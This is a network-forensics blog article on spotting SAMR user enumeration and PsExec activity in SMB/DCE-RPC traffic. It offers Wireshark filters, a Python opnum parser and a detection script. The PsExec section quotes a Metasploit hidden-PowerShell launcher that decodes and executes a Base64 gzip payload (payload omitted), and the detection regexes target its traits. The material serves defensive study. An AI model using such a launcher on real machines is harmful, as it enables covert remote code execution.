
SMB: metadata in RPC

By Petr Stuchlík (stuchl4n3k)

They call it DCE/RPC, but at the end of the day it's just a huge pile of cleartext metadata on your network.

This is another article in the series on metadata for network forensics. In the previous article I gave some examples of metadata hiding in common SMB file transfers and today I am going to briefly describe Remote Procedure Calls over SMB.

While Samba is mostly known as a file and printer sharing solution, it also provides Named Pipes to facilitate communication between local and remote processes.

Now, in Windows networks, Named Pipes are typically used by the MSRPC protocol. MSRPC is basically an implementation of the Distributed Computing Environment Remote Procedure Call (DCE/RPC) protocol, used to execute functions on the remote endpoint and to transfer data. This allows MSRPC to copy files, work with the remote Windows registry and manage Windows services while having the benefit of the SMB authentication layer (since a named pipe is just another type of "share"). The following services are typical examples of MSRPC traffic generators:

  • MS Sharing
  • MS Security (NTLMSSP)
  • MS Active Directory
  • MS Print
  • MS Terminal Server
  • MS Remote Services

So e.g. Spoolsvc.exe can generate a packet which looks like this:

+-------------------------------+
|              IP               |
+-------------------------------+
|             TCP               |
+-------------------------------+
|        SMB Named Pipe         |
+-------------------------------+
|        MSRPC (DCE/RPC)        |
+-------------------------------+
|     Print Spooler Service     |
+-------------------------------+

401TRG compiled an excellent resource on this topic, and the packet samples in the following sections are borrowed from their work.

Domain users enumeration

The Security Account Manager (SAMR) protocol uses SMB as one of its transport protocols. In this case, SMB connects to the samr pipe on the IPC$ share. The client can then invoke SAMR methods to enumerate domains (samr.opnum == 6), enumerate domain users (samr.opnum == 13), query user info (samr.opnum == 36), etc. The following filter shows packets with user information.

[Image: samr user enum packet]

Wireshark filter: samr.samr_EnumDomainUsers.sam or samr.samr_QueryUserInfo.info
PCAP sample: smb_net_user.pcap by 401TRG
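
What the samr.opnum filter reads out of the named-pipe payload, as an added example (not code from the article or from 401TRG): a parser for the DCE/RPC request header that labels the three opnums named above. The function names and the sample PDUs built by `build_request` are constructed for illustration.

```python
import struct

# SAMR opnums quoted in the article; only meaningful on the samr pipe.
SAMR_OPNUMS = {6: "enumerate domains", 13: "enumerate domain users", 36: "query user info"}
PTYPE_REQUEST = 0  # DCE/RPC connection-oriented request PDU


def parse_request_opnum(pdu: bytes):
    """Return the opnum of a DCE/RPC v5 request PDU, or None for anything else."""
    if len(pdu) < 24:  # 16-byte common header + 8-byte request header
        return None
    version, _minor, ptype, _flags = struct.unpack_from("4B", pdu, 0)
    if version != 5 or ptype != PTYPE_REQUEST:
        return None
    # Data representation label: high nibble of byte 4 is 1 for little-endian integers.
    endian = "<" if pdu[4] >> 4 == 1 else ">"
    frag_length, _auth_length, _call_id = struct.unpack_from(endian + "HHI", pdu, 8)
    if frag_length < 24:
        return None  # malformed length field
    _alloc_hint, _context_id, opnum = struct.unpack_from(endian + "IHH", pdu, 16)
    return opnum


def label_samr_call(pipe: str, pdu: bytes):
    """Map a request seen on the samr pipe to the article's method label."""
    if pipe.lower().rsplit("\\", 1)[-1] != "samr":
        return None
    return SAMR_OPNUMS.get(parse_request_opnum(pdu))


def build_request(opnum: int, little_endian: bool = True, ptype: int = PTYPE_REQUEST) -> bytes:
    """Construct a minimal stub-less PDU for testing (not captured traffic)."""
    endian = "<" if little_endian else ">"
    header = bytes([5, 0, ptype, 0x03, 0x10 if little_endian else 0x00, 0, 0, 0])
    return header + struct.pack(endian + "HHIIHH", 24, 0, 1, 0, 0, opnum)


if __name__ == "__main__":
    for pipe, pdu in [("samr", build_request(13)), ("\\PIPE\\samr", build_request(36, False)),
                      ("svcctl", build_request(13)), ("samr", build_request(13, ptype=11))]:
        print(pipe, label_samr_call(pipe, pdu))
```

An opnum only has meaning relative to the interface bound on that pipe, which is why the pipe name is checked first; the same number on svcctl is a different call.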

PsExec

PsExec is a popular Sysinternals Suite tool for remote administration in Active Directory environments and is often an attacker's favorite choice for remote code execution attacks. A deep dive into PsExec can be found in this blog.

In a basic attack scenario, the binary PSEXESVC.exe is transferred over the SMB protocol to a victim machine using the ADMIN$ share. It is then executed remotely as a temporary service using the IPC$ share. The following filter will match SMB transfers and invocations of PsExec based on filename detection.

Wireshark filter: smb.file ~ "PSEXESVC" or smb2.filename ~ "PSEXESVC" or svcctl.servicename ~ "PSEXESVC"
PCAP sample: smb_psexec_add_user.pcap by 401TRG

It is, however, worth noting that such a file transfer usually triggers alarms, so PsExec modules such as Metasploit's attempt to evade detection by invoking PowerShell via RPC. An example of how Metasploit obfuscates its payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[Base64-encoded, gzip-compressed payload omitted]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Wireshark alone won't get you very far here, but sometimes you should be able to spot PowerShell in SMB packets and work from there:

Wireshark filter: smb.file ~ "POWERSHELL" or smb2.filename ~ "POWERSHELL" or svcctl.binarypathname ~ "POWERSHELL"
PCAP sample: smb_metasploit_psexec_pth_download_meterpreter.pcap by 401TRG
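
The two filename filters above and the command-line traits of the Metasploit example can be combined into one triage pass over service-creation records, as an added example (not code from the article). It assumes each record has already been reduced to the svcctl.servicename and svcctl.binarypathname values; the rule names, verdict labels and sample records are constructed for illustration.

```python
import re

# Indicators come from the article's Wireshark filters and the command line it shows.
NAME_RULES = {"psexec_service": re.compile(r"PSEXESVC", re.I)}
PATH_RULES = {
    "psexec_binary": re.compile(r"PSEXESVC", re.I),
    "powershell": re.compile(r"powershell", re.I),
    "comspec_launcher": re.compile(r"%COMSPEC%", re.I),
    # PowerShell accepts parameter prefixes, so match -nop/-NoProfile and -w/-WindowStyle.
    "no_profile": re.compile(r"(?<!\S)-nop[a-z]*", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+hidden\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "gzip_stream": re.compile(r"GzipStream", re.I),
    "invoke_expression": re.compile(r"\bIEX\b", re.I),
}


def triage_service_create(service_name: str, binary_path: str):
    """Return (verdict, matched rule names) for one svcctl service creation."""
    hits = [n for n, rx in NAME_RULES.items() if rx.search(service_name)]
    hits += [n for n, rx in PATH_RULES.items() if rx.search(binary_path)]
    if "psexec_service" in hits or "psexec_binary" in hits:
        verdict = "psexec"
    elif {"powershell", "base64_decode"} <= set(hits):
        verdict = "encoded-powershell"
    elif "powershell" in hits:
        verdict = "powershell"
    else:
        verdict = "none"
    return verdict, hits


# Constructed records (service name, binary path); the Base64 value is a placeholder.
SAMPLES = [
    ("PSEXESVC", r"%SystemRoot%\PSEXESVC.exe"),
    ("aBcDeFgH", "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c "
                 "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('QUJD'));"
                 "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
                 "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
]

if __name__ == "__main__":
    for name, path in SAMPLES:
        print(name, *triage_service_create(name, path))
```

A renamed service binary defeats the PSEXESVC rules, so the command-line traits are the more durable signal of the two.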


As you can see, RPC can be used to call remote functions, which can also mean starting a remote service, which in turn can do almost anything you want. Next time I am going to dig up some bits in the SMB traffic which can prove useful in endpoint fingerprinting.
